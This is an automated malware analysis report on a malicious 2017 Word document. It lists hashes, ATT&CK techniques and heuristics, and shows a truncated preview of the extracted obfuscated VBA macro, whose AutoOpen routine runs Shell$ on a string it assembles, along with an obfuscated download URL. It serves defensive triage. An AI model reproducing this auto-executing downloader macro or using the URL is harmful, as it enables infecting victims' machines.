Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b72377bee6fc45b6…

MALICIOUS

Office (OLE)

152.0 KB Created: 2017-11-14 19:15:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: 66029e61361c15d7e710dd8ef52cff3e SHA-1: 415d522b11e9cbb25e2d640bd60ce6b106663514 SHA-256: b72377bee6fc45b6bb7fbb7725b340b23c1393131bf85766b8ebd7d07c71cdea
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a malicious VBA macro. The AutoOpen macro executes a Shell() command, which is a common technique for downloading and executing further malicious content. The obfuscated script and the presence of a suspicious URL suggest a downloader or droppper functionality.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://KM5+KM5www.1001KM5+KM5parfuKM5+KM5mz.ru/lKM5+KM5jBfKS8i+S8iM5+KM5i/,KM5+KM5htKM5+KM5tp://KM5+K In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 211698 bytes
SHA-256: ab35ab23504309c8a3a1489cce74daf88ab8352428ab0298ed968275ca693555
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 64 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "foVjtrtuI"
Sub AutoOpen()
EUzLFYXYi = "utbXRtzqv" + "inEUSiFKP" + "AENPTAYGm" + "OcbMmvbhR"
Shell$ XrbNVPkQN, 0
sitiUnkZo = "PkCVFvJXU" + "RfZbzLHjN" + "URAJtlNNf" + "VSjZiuMIW"
End Sub
Function XrbNVPkQN()
GMHwqvaKzhY = "DiGIr7ah12AZ1XzikZdtQbsppDJjbIESIPYhwiWlHbpOqzhFiQwHdQaQVNAAMRsfVQtmwQfGCrmomdwqVDBLLwpspHMldVZpiKtaGvHOkqEldlisOrp4aTz8zcukCR"
DQCBTEJswj = Mid(GMHwqvaKzhY, 14, 100)
qMlKnT = Array(Array(12, 73, 14, 20), Array(64, 31, 64, 97))
SPwQXqkTP = Array(Array(55, 97, 38, 72), Array(19, 75, 77, 84))
RWYFFRI = Array(Array(33, 35, 24, 85), Array(76, 87, 30, 38))
dnDTSwr = "iwTkIU8qzVOBQjjvCzkhzDJNcCzwEuGhNizvMzNasppjADpwGIACqbMdKEcLbvlEOjomjkiDlKpJOZNZMAswuDqmRTlHWBwwDkVUODPVZwRD9H"
jJjifLq = Mid(dnDTSwr, 8, 100)
ZWIZmFqVFYS = Array(Array(90, 93, 41, 78), Array(47, 20, 10, 61))
focckajbEY = Array(Array(63, 51, 93, 69), Array(34, 88, 62, 12))
vTvRfKv = Array(Array(81, 90, 67, 17), Array(90, 18, 57, 35))
YojkWDOHdz = "muknJzIbSlSWbapADUdEojSYwjJloAzwGPzmbBYCFPlvTGWQYGibBCIzmLodoWmSoTQLdCYBwazZwWFrJsNiRVwEHzAQMuOjcSHzqLnVhhfbDizPuvlnIIVMfGzUi4WBOv79uHtSZdljr1zb8"
LbnJPjVr = Mid(YojkWDOHdz, 3, 110)
vnjSNFJo = Array(Array(90, 77, 63, 33), Array(66, 18, 44, 54))
VwwSp = Array(Array(59, 58, 84, 74), Array(17, 39, 50, 40))
HcuAGLJoI = Array(Array(90, 55, 20, 24), Array(12, 59, 87, 74))
wBWWqw = "KFzTvIEASWMDdBIoBMPzfPFBwFrAkpVAZAlKPbSbXSodiHJUZsiOnlTzAvVqQDPdBLidQzYauoZNacXqvXbsLHNohlKUFbKUCLcSdjDbUdtRGIjGAGSz"
DKXiMlDjHRu = Mid(wBWWqw, 2, 104)
IfRiDsLFmdt = Array(Array(67, 67, 78, 59), Array(63, 49, 43, 61))
qwSJGiGCmGw = Array(Array(63, 88, 28, 54), Array(39, 56, 85, 33))
RnYfiRTG = Array(Array(43, 89, 54, 60), Array(28, 86, 21, 13))
oalvqKCKwWp = "J1intHJZXOi6wAIfPutnqEMSazwjXYwBfpJXADvcquTAHHIrwnoVupWQUaUAjAqLshfXjiPumotPkLKTpFjkjaHpSsDZivwqEIHackHOXtjFE4IaHoF"
dLiCdOq = Mid(oalvqKCKwWp, 22, 87)
iVNFIdV = Array(Array(24, 68, 63, 32), Array(23, 68, 54, 13))
JUidTsa = Array(Array(51, 32, 44, 32), Array(65, 78, 32, 80))
ZtoZISYXG = Array(Array(66, 11, 62, 78), Array(31, 93, 74, 75))
WjnRzYzr = "ZKfMzG99ZRrpPIzz8ZUPlwHEVzVOJNiNlzuTdzIZcVEvPnzHXEfwjnFhMsCdSfnAKcdBzvmtdNMirMpiANqEhldzrNHlwiGwhEJdmkJUVOfVZiJiraWz"
kAGfdjiwf = Mid(WjnRzYzr, 22, 77)
wCGFozzvW = Array(Array(82, 34, 72, 91), Array(42, 10, 19, 69))
JqjhjzMSJn = Array(Array(98, 45, 37, 57), Array(98, 41, 10, 60))
RCFJL = Array(Array(59, 14, 45, 90), Array(45, 51, 93, 63))
pzkPqRSF = "HcmQtjlCPlrCzbDpJLpCUPzahjLsFdEsKJlWWwmKAODzQTCXtOaJiMizWwOhUtwljwsppjSLZfBFLzKNjowrCuOzalULzjh2XRjnOVzwsQv4"
GLNFTUOj = Mid(pzkPqRSF, 6, 85)
IQRAjLJW = Array(Array(37, 90, 46, 18), Array(94, 70, 47, 25))
hvltzFCqAR = Array(Array(79, 42, 53, 19), Array(43, 59, 73, 26))
mrRGDPzXs = Array(Array(76, 33, 35, 23), Array(15, 58, 43, 94))
TpCwjF = "FRWSrKFZ1lSI9fYmDbaa7AUzQfcFdUwYcntzNtpPwuPPtlmozS8rZtizrv27Q8"
AYKZkFZ = Mid(TpCwjF, 27, 23)
BTPfPiW = Array(Array(63, 34, 83, 42), Array(65, 94, 37, 14))
lLCbiwNwLj = Array(Array(67, 31, 75, 68), Array(95, 10, 39, 77))
GdMiNMkir = Array(Array(65, 61, 69, 16), Array(28, 34, 34, 16))
iCfhRzmtN = "iiUb1DWKnoEEtvQbfbcPWKhUKaicpdVzfABaHcUCAdoWjVVJFuMTPhulawcLXEQJSFYsuqTDGZOtVLkoFZWvRBjwGPzKAJfwMiDizcPPbJNqSBQPLnFwhVsRVamfqICwuRjqHGrdJHUIotfEwkzMEjPrmmIWpkYS9CSZJmdaA9DiA8Bz"
aRftHm = Mid(iCfhRzmtN, 9, 152)
qtSviwW = Array(Array(95, 87, 51, 69), Array(84, 68, 60, 21))
zPIaI = Array(Array(87, 71, 20, 79), Array(30, 83, 77, 14))
tpVkcP = Array(Array(59, 74, 10, 20), Array(24, 67, 41, 72))
HQanEYcd = "mmBMTPvipuNTVwSPpdQjGcjorfTQrwjCwCdfHEGQACiJzsYBlFOuYmNuBzatnJdwOLUTVmIlWAjDzaqzHSimildMpjiKdNdqZivmXFjwzdXYFKwaGbmUfrOchIilIwIJWpiPfDcBmfoEOFGimDDBbJLhUSEObumPm1tZVwIVuzYNUAOR"
RZzJpUph = Mid(HQanEYcd, 10, 149)
jznrZCaJDmc = Array(Array(67, 26, 45, 15), Array(73, 71, 37, 83))
OaXHOFWhfj = Array(Array(5
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.